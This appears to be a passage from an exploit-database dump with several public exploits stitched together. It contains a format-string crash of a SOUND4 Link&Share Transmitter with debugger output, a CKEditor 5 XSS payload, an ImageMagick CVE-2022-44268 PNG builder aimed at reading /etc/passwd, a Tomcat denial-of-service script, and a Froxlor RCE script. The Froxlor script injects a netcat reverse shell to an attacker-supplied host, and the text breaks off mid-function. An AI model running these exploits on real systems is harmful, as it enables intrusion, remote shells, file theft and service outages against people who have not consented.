AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd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fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> kb # ChildEBP RetAddr Args to Child 00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] 02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] 03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] 04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] *** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe *** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe 05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] WARNING: 
Stack unwind information not available. Following frames may be wrong. 06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 00000005 Subcode: 0x5 FAST_FAIL_INVALID_ARG FAULTING_THREAD: 000059e8 DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG PROCESS_NAME: LinkAndShareTransmitter.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. 
EXCEPTION_CODE_STR: c0000409 EXCEPTION_PARAMETER1: 00000005 WATSON_BKT_PROCSTAMP: 6144495e WATSON_BKT_PROCVER: 1.1.0.2 PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter WATSON_BKT_MODULE: MSVCR120.dll WATSON_BKT_MODSTAMP: 577e0f1e WATSON_BKT_MODOFFSET: a46b1 WATSON_BKT_MODVER: 12.0.40660.0 MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013 BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20 NTGLOBALFLAG: 70 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143 ANALYSIS_VERSION: 10.0.16299.91 x86fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n270] Type: [FAIL_FAST] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] ID: [0n257] Type: [INVALID_ARG] Class: Addendum Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] BUGCHECK_STR: FAIL_FAST_INVALID_ARG PRIMARY_PROBLEM_CLASS: FAIL_FAST LAST_CONTROL_TRANSFER: from 64504677 to 645046b1 STACK_TEXT: 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 WARNING: Stack unwind information not available. Following frames may be wrong. 
0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882 FOLLOWUP_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h FAULT_INSTR_CODE: 6a5629cd FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_LINE_NUMBER: 132 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: MSVCR120!_invoke_watson+e FOLLOWUP_NAME: MachineOwner MODULE_NAME: MSVCR120 IMAGE_NAME: MSVCR120.dll DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e FAILURE_EXCEPTION_CODE: c0000409 FAILURE_IMAGE_NAME: MSVCR120.dll BUCKET_ID_IMAGE_STR: MSVCR120.dll FAILURE_MODULE_NAME: MSVCR120 BUCKET_ID_MODULE_STR: MSVCR120 FAILURE_FUNCTION_NAME: _invoke_watson BUCKET_ID_FUNCTION_STR: _invoke_watson BUCKET_ID_OFFSET: e BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e BUCKET_ID_MODCHECKSUM: f8aef BUCKET_ID_MODVER_STR: 12.0.40660.0 BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_ FAILURE_PROBLEM_CLASS: FAIL_FAST FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson WATSON_STAGEONE_URL: 
http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 TARGET_TIME: 2023-01-29T15:09:52.000Z OSBUILD: 19044 OSSERVICEPACK: 2364 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x86 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: 2008-01-07 11:33:18 BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.2364 ANALYSIS_SESSION_ELAPSED_TIME: 635d ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f} Followup: MachineOwner --------- 0:000> d MSVCP120 70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ.............. 70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@....... 70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................ 70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th 70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno 70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS 70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$....... 
0:000> lmvm MSVCR120 Browse full module list start end module name 64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll Image name: MSVCR120.dll Browse all global symbols functions data Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E) CheckSum: 000F8AEF ImageSize: 000EE000 File version: 12.0.40660.0 Product version: 12.0.40660.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Microsoft Corporation ProductName: Microsoft® Visual Studio® 2013 InternalName: msvcr120.dll OriginalFilename: msvcr120.dll ProductVersion: 12.00.40660.0 FileVersion: 12.00.40660.0 built by: VSULDR FileDescription: Microsoft® C Runtime Library LegalCopyright: © Microsoft Corporation. All rights reserved. 0:000> x /D /f MSVCR120!getenv MSVCR120!getenv (char *) 0:000> x /D /f MSVCR120!getenv 64477785 MSVCR120!getenv (char *) .. 
0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> r eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> u 645046b1 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: 645046b1 cd29 int 29h 645046b3 56 push esi 645046b4 6a01 push 1 645046b6 be170400c0 mov esi,0C0000417h 645046bb 56 push esi 645046bc 6a02 push 2 645046be e85efeffff call MSVCR120!_call_reportfault (64504521) 645046c3 56 push esi 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> g WARNING: Continuing a non-continuable exception (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) 
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file 02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. .1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA
-
CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)
# Exploit Title: CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: February 09, 2023
# Exploit Author: Manish Pathak
# Vendor Homepage: https://cksource.com/
# Software Link: https://ckeditor.com/ckeditor-5/download/
# Version: 35.4.0
# Tested on: Linux / Web
# CVE : CVE-2022-48110

CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 Widget, as the editor fails to sanitize user-provided data. An attacker can execute arbitrary script in the browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. CKEditor5 version 35.4.0 was tested and found to be vulnerable.

Documentation available at https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#security

Security Docs Say:
"""The HTML embed feature does not currently execute code in <script> tags. However, it will execute code in the on* and src="javascript:..." attributes."""

Payload:
<div class="raw-html-embed">
<script>alert(456)</script>
</div>
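The documentation quoted above draws a line between what an HTML embed will and will not execute: `<script>` elements are inert, `on*` event-handler attributes and `javascript:` URLs are not. The scanner below is an added example (not CKEditor code, and not the advisory author's) that audits stored embed HTML for exactly those vectors with the standard-library parser, so already-saved content can be checked offline. The sample inputs are constructed for the example; the URL-attribute list is an assumption covering the common URL-bearing attributes.

```python
"""Audit stored CKEditor 5 HTML-embed content for the vectors the docs say execute.

Added example; not part of CKEditor or of the advisory. Inputs are constructed.
"""
from html.parser import HTMLParser

# Attributes that take a URL and can therefore carry a javascript: scheme (assumed list)
URL_ATTRS = {"src", "href", "action", "formaction", "xlink:href", "data", "poster"}


def _is_javascript_url(value):
    """Normalise the way browsers do before scheme matching: drop ASCII
    whitespace and control characters, then compare case-insensitively."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    return cleaned.lower().startswith("javascript:")


class EmbedHazardScanner(HTMLParser):
    """Collects on* handlers, javascript: URLs and <script> elements.

    HTMLParser already lowercases tag and attribute names and decodes
    character references in attribute values, so java&#115;cript: is caught."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.event_handlers = []  # (tag, attr, value): executes in the embed
        self.script_urls = []     # (tag, attr, value): executes in the embed
        self.script_tags = 0      # present but inert per the CKEditor docs

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, value in attrs:
            if name.startswith("on"):
                self.event_handlers.append((tag, name, value))
            elif name in URL_ATTRS and _is_javascript_url(value):
                self.script_urls.append((tag, name, value))


def scan_embed(html):
    """Return a summary of executable content found in one HTML embed."""
    p = EmbedHazardScanner()
    p.feed(html)
    p.close()
    return {
        "event_handlers": p.event_handlers,
        "script_urls": p.script_urls,
        "script_tags": p.script_tags,
        # What the docs say actually runs inside the embed preview
        "executes_in_embed": bool(p.event_handlers or p.script_urls),
    }


if __name__ == "__main__":
    # The advisory's payload and a handler-based variant, both constructed here
    for sample in ('<div class="raw-html-embed"><script>alert(456)</script></div>',
                   '<div class="raw-html-embed"><img src=x onerror=alert(1)></div>'):
        print(scan_embed(sample))
```

Run it over exported embed content and triage the `executes_in_embed` hits first; a `script_tags` count on its own is worth cleaning up but, per the quoted docs, does not run in the embed.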
-
ImageMagick 7.1.0-49 - Arbitrary File Read
# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read
# Google Dork: N/A
# Date: 06/02/2023
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/
# Version: <= 7.1.0-49
# Tested on: 7.1.0-49 and 6.9.11-60
# CVE : CVE-2022-44268 (CVE Owner: Metabase Q Team https://www.metabaseq.com/imagemagick-zero-days/)
# Exploit pre-requirements: Rust
# PoC : https://github.com/voidz0r/CVE-2022-44268
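The advisory points at a Rust PoC without describing the trigger. Per the Metabase Q write-up it links, CVE-2022-44268 fires when an affected ImageMagick processes a PNG whose tEXt chunk uses the keyword `profile`: the chunk text is treated as a filename, the file is read, and its bytes come back hex-encoded in a "Raw profile type" text chunk of the output image. The block below is an added example, not the author's PoC and not ImageMagick code: it builds such a PNG with the standard library only and decodes a "Raw profile type" value back to bytes. The target path and the sample profile text are constructed for the example.

```python
"""Craft a CVE-2022-44268 PNG and decode the leaked 'Raw profile type' text.

Added example; not part of the advisory or of ImageMagick. Paths are constructed.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """Serialise one chunk: 4-byte big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_profile_png(target_path):
    """Minimal 1x1 8-bit greyscale PNG carrying tEXt 'profile' = target_path."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)       # w, h, depth, colour, comp, filter, interlace
    text = b"profile\x00" + target_path.encode("latin-1")     # tEXt layout: keyword NUL text
    idat = zlib.compress(b"\x00\x00")                        # one scanline: filter byte + one pixel
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat)
            + png_chunk(b"IEND", b""))


def iter_chunks(png):
    """Yield (type, data) for each chunk, verifying the signature and every CRC."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("missing PNG signature")
    off = 8
    while off < len(png):
        (length,) = struct.unpack(">I", png[off:off + 4])
        ctype = png[off + 4:off + 8]
        data = png[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", png[off + 8 + length:off + 12 + length])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, data
        off += 12 + length


def is_well_formed(png):
    """True if the signature is present and every chunk parses with a good CRC."""
    try:
        for _ in iter_chunks(png):
            pass
        return True
    except (ValueError, struct.error):
        return False


def text_chunks(png):
    """Return {keyword: text} for every tEXt chunk (latin-1, as the PNG spec says)."""
    out = {}
    for ctype, data in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, val = data.partition(b"\x00")
            out[key.decode("latin-1")] = val.decode("latin-1")
    return out


def decode_raw_profile(text):
    """Decode a 'Raw profile type' value: an optional name line, a decimal byte
    count, then hex digits wrapped over several lines. Returns the raw bytes."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    idx = next(i for i, ln in enumerate(lines) if ln.isdigit())   # the byte-count line
    declared = int(lines[idx])
    raw = bytes.fromhex("".join(lines[idx + 1:]))
    if len(raw) != declared:
        raise ValueError(f"declared {declared} bytes but decoded {len(raw)}")
    return raw


if __name__ == "__main__":
    with open("profile.png", "wb") as fh:
        fh.write(build_profile_png("/etc/passwd"))
    print("wrote profile.png; after conversion, read the text chunks with: identify -verbose out.png")
```

On a patched build the `profile` text is left alone and no "Raw profile type" chunk appears, which makes the same decoder a quick way to confirm a fix: convert the crafted file, then check that `text_chunks()` of the output contains no hex payload.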
-
Apache Tomcat 10.1 - Denial Of Service
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/

#!/usr/bin/env python3
# coding: utf-8

from pwn import *
import time
import threading
import subprocess

threads = []


def send_payload():
    # Connect to the cluster receiver port and keep pushing oversized frames
    r = remote("localhost", 4000)
    while True:
        r.send(b"FLT2002" + b"A" * 10000)


for _ in range(5):
    new_thread = threading.Thread(target=send_payload)
    threads.append(new_thread)
    new_thread.start()

for old_thread in threads:
    old_thread.join()
-
Froxlor 2.0.3 Stable - Remote Code Execution (RCE)
#!/usr/bin/python3
# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE)
# Date: 2023-01-08
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2023-0315
# Vendor Homepage: https://froxlor.org/
# Version: v2.0.3
# Tested on: Ubuntu 20.04 / PHP 8.2

import telnetlib
import requests
import socket
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
from threading import Thread

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print("[~] Usage : ./froxlor-rce.py url username password ip port")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()


def login():
    login_info = {
        "loginname": username,
        "password": password,
        "send": "send",
        "dologin": ""
    }
    login_request = request.post(url + "/index.php", login_info, allow_redirects=False)
    login_headers = login_request.headers
    location_header = login_headers["Location"]
    if location_header == "admin_index.php":
        return True
    else:
        return False


def change_log_path():
    # Point the file logger at a Twig template so logged text gets rendered as Twig
    change_log_path_url = url + "/admin_settings.php?page=overview&part=logging"
    csrf_token_req = request.get(change_log_path_url)
    csrf_token_req_response = csrf_token_req.text
    soup = BeautifulSoup(csrf_token_req_response, "lxml")
    csrf_token = (soup.find("meta", {"name": "csrf-token"})["content"])
    print("[+] Main CSRF token retrieved %s" % csrf_token)
    multipart_data = {
        "logger_enabled": (None, "0"),
        "logger_enabled": (None, "1"),  # duplicate key: only "1" survives in a Python dict, which is what we want
        "logger_severity": (None, "2"),
        "logger_logtypes[]": (None, "file"),
        "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"),
        "logger_log_cron": (None, "0"),
        "csrf_token": (None, csrf_token),
        "page": (None, "overview"),
        "action": (None, ""),
        "send": (None, "send")
    }
    req = request.post(change_log_path_url, files=multipart_data)
    response = req.text
    if "The settings have been successfully saved." in response:
        print("[+] Changed log file path!")
        return True
    else:
        return False


def inject_template():
    # The theme name is written to the log (now a template); Twig executes the expression on the next render
    admin_page_path = url + "/admin_index.php"
    csrf_token_req = request.get(admin_page_path)
    csrf_token_req_response = csrf_token_req.text
    soup = BeautifulSoup(csrf_token_req_response, "lxml")
    csrf_token = (soup.find("meta", {"name": "csrf-token"})["content"])
    onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port)
    payload = "{{['%s']|filter('exec')}}" % onliner
    data = {
        "theme": payload,
        "csrf_token": csrf_token,
        "page": "change_theme",
        "send": "send",
        "dosave": "",
    }
    req = request.post(admin_page_path, data, allow_redirects=False)
    try:
        location_header = req.headers["Location"]
        if location_header == "admin_index.php":
            print("[+] Injected the payload successfully!")
    except:
        print("[-] Can't Inject payload :/")
        exit()
    handler_thread = Thread(target=connection_handler, args=(port,))
    handler_thread.start()
    print("[+] Triggering the payload ...")
    req2 = request.get(admin_page_path)


def connection_handler(port):
    print("[+] Listener started on port %s" % port)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
